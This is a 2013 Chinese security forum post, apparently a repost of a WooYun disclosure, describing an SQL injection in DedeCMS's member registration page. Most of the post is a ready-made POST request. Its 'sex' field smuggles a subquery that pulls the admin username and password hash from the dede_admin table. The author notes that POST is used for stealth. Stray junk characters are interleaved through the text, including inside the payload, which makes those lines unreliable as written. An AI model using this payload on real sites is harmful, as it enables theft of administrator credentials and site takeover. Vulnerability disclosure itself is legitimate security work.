找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2513|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞: q: j. N2 V, }
简要描述:' T* y  D8 w" V- y( Z$ P+ ]
' j0 y: ?  D) K
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 i* |5 y1 m; F% O3 r# ]
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
, K6 Z( l, h0 _. r详细说明:跟这个漏洞
- X" B, A/ {* T8 b
( ~* C, a$ W0 G$ [- QWooYun: Dedecms SQL注射导致审核机制绕过漏洞
5 V: m/ ]' Y' u; R4 s. q是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
' S2 @" T1 z0 h0 \2 E! `( z$ UPOST提交以下数据,其实不用POST提交的,这样隐蔽点.! Q. n! P" }8 v3 U- h+ ~

  W8 i2 R$ D. T( Z  a" N) \& k: jwww.political-security.com/member/reg_new.php8 l! @( T- C5 W/ Y4 c/ y6 C* x

6 j# x7 C5 I& l# d; WPOST& n6 H9 t9 E( k
+ U1 n4 C3 a$ S  t2 H! [' `' [
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&; a3 ]% ]# L) B5 o( B
userid=c4rp3nt3r&uname=c4rp3nt3r+ F: i& i& ?" C5 M; [8 \
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss5 p$ t# Z6 _, \5 P3 @  O  B! g
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,8 H. p7 U7 d' F4 |( }
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');8 |  `- d* k$ m! [0 k
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表